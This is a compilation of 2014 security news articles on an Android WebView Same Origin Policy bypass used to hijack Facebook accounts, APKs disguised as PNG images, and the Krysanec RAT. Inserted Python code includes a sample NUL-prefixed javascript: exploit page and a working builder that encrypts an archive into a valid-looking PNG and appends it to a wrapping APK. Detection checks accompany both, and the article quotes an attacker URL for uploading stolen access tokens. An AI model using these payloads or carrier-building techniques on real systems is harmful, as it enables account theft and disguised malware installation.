November 23, 2024

Facebook Users Targeted Via Android Same Origin Policy Vulnerability

Posted on December 29, 2014 by Brian Prince in Security

Researchers at Trend Micro say attackers are actively exploiting a vulnerability in Android’s WebView component in order to compromise Facebook accounts.

The flaw allows the attackers to bypass Android’s Same Origin Policy (SOP), and impacts devices running versions of the operating system prior to 4.4. The vulnerability, CVE-2014-6041, was first disclosed in September by an independent researcher. But months later, the vulnerability continues to be exploited in the wild.

“The Android WebView in Android before 4.4 allows remote attackers to bypass the Same Origin Policy via a crafted attribute containing a \u0000 character, as demonstrated by an onclick="window.open('\u0000javascript: sequence to the Android Browser application 4.2.1 or a third-party web browser,” according to the National Vulnerability Database.

According to Trend Micro Mobile Security Engineer Simon Huang, the attack targets Facebook users via a link in a particular Facebook page that leads to a malicious site. The page contains obfuscated JavaScript code that includes an attempt to load a Facebook URL in an inner frame. The user will only see a blank page as the page’s HTML has been set not to display anything via its div tag while the inner frame has a size of one pixel, he added.

“While these routines are being carried out, the SOP bypass is being performed,” he blogged, adding that a remote JavaScript file is loaded from a legitimate cloud storage provider.
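As an added illustration (this is not code from Trend Micro, the NVD or the attackers), the following Python checks captured page content for the primitive the NVD entry describes, a NUL character directly in front of a javascript: URL handed to window.open or placed in an href/src, and for the one-pixel iframe trick Huang describes above. The two sample pages are constructed; the NUL spellings beyond the literal \u0000 quoted by the NVD (\x00, %00, HTML entities, a raw NUL byte) are assumptions about variants worth normalising, not taken from the advisory.

```python
import re

# NUL spellings to normalise before matching. The NVD text shows \u0000; the other
# forms are assumed variants an analyst would also want to catch.
NUL_FORMS = re.compile(r"\\u0000|\\x00|%00|&#0+;|&#x0+;|\x00", re.IGNORECASE)

# window.open(...), href= or src= whose string value starts with NUL + javascript:
SOP_BYPASS = re.compile(
    r"(?:window\.open\s*\(|\b(?:href|src)\s*=)\s*['\"]?\s*\x00\s*javascript:",
    re.IGNORECASE,
)
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR = re.compile(r"""(\w+)\s*=\s*["']([^"']*)["']""")


def normalise_nul(text: str) -> str:
    """Collapse every NUL spelling to a real NUL so one pattern matches them all."""
    return NUL_FORMS.sub("\x00", text)


def find_sop_bypass(html: str) -> list:
    """(line number, matched fragment) for every NUL-prefixed javascript: URL."""
    hits = []
    for lineno, line in enumerate(normalise_nul(html).splitlines(), 1):
        for m in SOP_BYPASS.finditer(line):
            hits.append((lineno, m.group(0).replace("\x00", "\\u0000")))
    return hits


def tiny_iframes(html: str) -> list:
    """src of every iframe sized 0 or 1 pixel, the hiding trick described in the article."""
    found = []
    for tag in IFRAME_TAG.findall(html):
        attrs = {k.lower(): v for k, v in ATTR.findall(tag)}
        if attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1"):
            found.append(attrs.get("src", ""))
    return found


# Constructed samples (not captured from the real campaign).
MALICIOUS_PAGE = r"""<html><body><div style="display:none">
<a href="#" onclick="window.open('\u0000javascript:alert(document.domain)')">go</a>
<a href="%00javascript:alert(document.domain)">alt</a>
<iframe src="https://www.facebook.com/" width="1" height="1"></iframe>
</div></body></html>"""

BENIGN_PAGE = r"""<html><body>
<a href="javascript:void(0)" onclick="window.open('https://example.com/')">ok</a>
<iframe src="https://example.com/widget" width="300" height="200"></iframe>
</body></html>"""

if __name__ == "__main__":
    print(find_sop_bypass(MALICIOUS_PAGE), tiny_iframes(MALICIOUS_PAGE))
    print(find_sop_bypass(BENIGN_PAGE), tiny_iframes(BENIGN_PAGE))
```

A plain javascript: URL without the NUL is deliberately not flagged, since that is ordinary web content; the finding is the NUL in front of it, which is what confused the pre-4.4 WebView's origin check.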

The file, he noted, contains the malicious code of the attack and enables the attackers to perform the following activities on Facebook:

  1. Add friends
  2. Like and follow Facebook pages
  3. Modify subscriptions
  4. Authorize a Facebook app to access the user’s public profile, friends list, birthday information, likes and friends’ likes
  5. Steal the victim’s access tokens and upload them to their server at http://{BLOCKED}martforchristmas.website/walmart/j/index.php?cid=544fba6ac6988&access_token=$token;
  6. Collect analytics data (such as victims’ location, HTTP referrer, etc.) using the legitimate service at https://whos.{BLOCKED}ung.us/pingjs/

“In addition to the code at the above site, we found a similar attack at http://www.{BLOCKED}php.com/x/toplu.php,” Huang explained. “We believe both of them are created by the same author because they share several function names, as well as the client_id of the Facebook app.”

“The client_id involved in this malware was ‘2254487659’,” he added. “This is an official BlackBerry App maintained by BlackBerry. We confirmed with BlackBerry and clarified that this malware is trying to take advantage of the trusted BlackBerry brand name and steal user’s access-tokens, which can be used to make requests to Facebook APIs and read user’s information or to publish content to Facebook on behalf of a person.”

BlackBerry is working with Facebook and Trend Micro to address the issue. Google has already issued a fix for the vulnerability for Android users.


Brian Prince is a Contributing Writer for SecurityWeek.

SecurityWeek RSS Feed

Researchers Hide Android Applications in Image Files

Posted on October 17, 2014 by Eduard Kovacs in Security

AMSTERDAM – BLACK HAT EUROPE – Researchers have found a way to trick Android users into executing potentially malicious applications by hiding them inside innocent-looking image files.

Axelle Apvrille, mobile/IoT malware analyst and researcher at Fortinet, and Ange Albertini, reverse engineer and author of Corkami.com, have created an application that can be used to encrypt an APK to make it look like a PNG image file.

In a real attack leveraging this method, the attacker sends an application containing an image to the potential victim. When the app is launched, the victim only sees the harmless-looking image. In the background, however, a malicious payload is installed onto the victim’s Android device.

To hide the installation of the malicious payload, the attacker can use the DexClassLoader constructor, which loads code from a DEX or APK file at runtime without going through the package installer, the experts said.

According to the researchers, the method works on Android 4.4.2 and prior versions of the operating system. Google developed a fix for the flaw back in June, but Apvrille told SecurityWeek in an interview that the fix is incomplete. The researchers have informed Google of this and the company is now working on a more efficient fix.

How does it work?

The attacker writes his malicious payload and encrypts it to make it look like a valid PNG image file. The encryption is done with AngeCryption, an application developed by the researchers.

Making AES ciphertext look like something specific is normally hard, but AngeCryption chooses the encryption parameters so that the encrypted APK is a valid PNG while decryption still yields the original APK, so Android doesn’t see any difference. The resulting image looks normal to users, except that it is about 500 KB in size, which is a lot for a small-resolution image.

The final step is to create a wrapping APK in which the malicious PNG is inserted, and then decrypted and installed.

An APK is a ZIP archive, and a ZIP archive ends with an End of Central Directory (EOCD) record. The researchers managed to add their specially crafted PNG file to the APK by appending it after the first EOCD and adding a second EOCD at the end, so the archive still finishes with a valid record.
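To make the three steps above concrete, here is an added Python example; it is not AngeCryption or the researchers’ code. A toy 128-bit block cipher stands in for AES (the cipher is an assumption of this example, but the IV arithmetic is identical for any block cipher in CBC mode): the IV is chosen so that the first ciphertext block is the PNG signature plus a chunk header, decryption still returns the original archive, and the "image" is then appended to a wrapping ZIP after its EOCD with a second EOCD added. The last two functions are the analyst’s side, counting EOCD records and measuring what trails the first one, which flags a carrier built this way. The key, entry names and the placeholder chunk type apKz are constructed, and the "APKs" are plain stored ZIPs built with zipfile.

```python
import hashlib, io, random, struct, zipfile

BLOCK = 16
PNG_SIG = b"\x89PNG\r\n\x1a\n"  # 8-byte PNG signature
EOCD_SIG = b"PK\x05\x06"        # ZIP End of Central Directory signature

def _schedule(key: bytes):
    """Toy SP-network standing in for AES (assumption of this example, NOT secure)."""
    rks = [hashlib.sha256(key + bytes([r])).digest()[:BLOCK] for r in range(4)]
    sbox = list(range(256))
    random.Random(hashlib.sha256(b"sbox" + key).digest()).shuffle(sbox)
    return rks, sbox

def toy_encrypt_block(key: bytes, block: bytes) -> bytes:
    rks, sbox = _schedule(key)
    for rk in rks:
        block = bytes(sbox[x ^ k] for x, k in zip(block, rk))  # key mix + substitution
        block = block[1:] + block[:1]                            # rotate one byte left
    return block

def toy_decrypt_block(key: bytes, block: bytes) -> bytes:
    rks, sbox = _schedule(key)
    for rk in reversed(rks):
        block = block[-1:] + block[:-1]
        block = bytes(sbox.index(x) ^ k for x, k in zip(block, rk))
    return block

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def cbc_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    out, prev = bytearray(), iv
    for i in range(0, len(data), BLOCK):
        prev = toy_encrypt_block(key, _xor(data[i:i + BLOCK], prev))
        out += prev
    return bytes(out)

def cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    out, prev = bytearray(), iv
    for i in range(0, len(data), BLOCK):
        cur = data[i:i + BLOCK]
        out += _xor(toy_decrypt_block(key, cur), prev)
        prev = cur
    return bytes(out)

def iv_for_prefix(key: bytes, first_plain: bytes, wanted_cipher: bytes) -> bytes:
    # CBC: C1 = E_k(P1 xor IV), so IV = D_k(C1) xor P1 forces the first ciphertext block to C1.
    return _xor(toy_decrypt_block(key, wanted_cipher), first_plain)

def pad(data: bytes) -> bytes:  # PKCS#7 padding to whole blocks
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data: bytes) -> bytes: return data[:-data[-1]]

def make_zip(entries: dict) -> bytes:  # constructed stand-in for an APK: a stored ZIP
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as z:
        for name, data in entries.items():
            z.writestr(name, data)
    return buf.getvalue()

def zip_entry_names(data: bytes) -> list:
    return zipfile.ZipFile(io.BytesIO(data)).namelist()

def build_carrier(wrapper_entries: dict, hidden: bytes) -> bytes:
    """Wrapping archive: original ZIP, the hidden 'image' after its EOCD, then a second EOCD."""
    carrier = make_zip(wrapper_entries)
    eocd = carrier[carrier.rfind(EOCD_SIG):]
    return carrier + hidden + eocd

def eocd_offsets(data: bytes) -> list:
    """Analyst check: every offset of the EOCD signature; a clean archive has exactly one."""
    offs, i = [], data.find(EOCD_SIG)
    while i != -1:
        offs.append(i)
        i = data.find(EOCD_SIG, i + 1)
    return offs

def bytes_after_first_eocd(data: bytes) -> int:
    """Analyst check: how much data trails the first EOCD record (22 bytes plus its comment)."""
    first = eocd_offsets(data)[0]
    comment_len = struct.unpack_from("<H", data, first + 20)[0]
    return len(data) - (first + 22 + comment_len)

def demo() -> dict:
    key = hashlib.sha256(b"example key").digest()[:BLOCK]             # assumed key
    payload = make_zip({"classes.dex": b"dex\n035\x00" + b"A" * 40})  # constructed "APK"
    padded = pad(payload)
    # Wanted first ciphertext block: PNG signature, chunk length covering the rest, placeholder type.
    prefix = PNG_SIG + struct.pack(">I", len(padded) - BLOCK) + b"apKz"
    iv = iv_for_prefix(key, padded[:BLOCK], prefix)
    image = cbc_encrypt(key, iv, padded)
    recovered = unpad(cbc_decrypt(key, iv, image))
    carrier = build_carrier({"AndroidManifest.xml": b"<manifest/>"}, image)
    return {"payload": payload, "image": image, "recovered": recovered, "carrier": carrier}
```

Two caveats for anyone turning the last two functions into a scanner: a real carrier also needs the rest of a PNG (chunk CRC, IHDR, IDAT, IEND) appended after the ciphertext so that the picture actually renders, which is why the researchers’ image is unusually large; and the four EOCD signature bytes can occur by chance inside compressed entry data, so a production check should validate each candidate record’s central-directory offset and size rather than just count signatures.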


Android Trojan Krysanec Comes Disguised as Legitimate Apps

Posted on August 13, 2014 by Eduard Kovacs in Security

Researchers at ESET have uncovered a new remote access Trojan (RAT) for Android that has been masked by cybercriminals as various popular applications.

The malware, detected by the security firm as Android/Spy.Krysanec, is capable of infiltrating both free and paid Android apps, and it has been distributed via a file sharing website, a Russian social network and other channels. It has been disguised as 3G Traffic Guard, a mobile banking app from Russia’s top lender Sberbank, and even ESET Mobile Security. However, unlike the legitimate programs, the trojanized versions are not signed with valid digital certificates.

According to ESET’s Robert Lipovsky, the malicious applications they have discovered actually contain the old multi-platform RAT known as Unrecom (previously known as Adwind). Trend Micro revealed back in April that the threat was upgraded to run on Android devices. At the time, the security firm also discovered that Unrecom worked as an APK binder, giving it the ability to trojanize legitimate applications.

Once it finds itself on a device, the threat can be used to download and execute additional components that enable cybercriminals to perform various activities, like recording audio through the microphone, taking pictures, accessing text messages, obtaining the current GPS location, and collecting information on installed apps, placed calls and visited webpages.

Researchers have found that some of the samples communicate with a command and control (C&C) server hosted on a domain belonging to No-IP, the dynamic DNS provider whose domains were seized recently by Microsoft as part of an operation against the Bladabindi (njRAT) and Jenxcus (NJw0rm) botnets. The domains were later returned to the DNS company and the case was dropped after Microsoft determined that No-IP was not knowingly facilitating the distribution of malware. 

“It’s a relatively straightforward job for someone with coding experience to decompile an existing Android app, insert malicious capabilities, and re-build it as new,” Nathan Collier, senior malware intelligence analyst at Malwarebytes Labs, said in an emailed statement. “The tools to make this possible can be found by anyone with a good working knowledge of a search engine. A lot of the Android RATs used also utilize existing pre-built toolkits, making it relatively straightforward.”
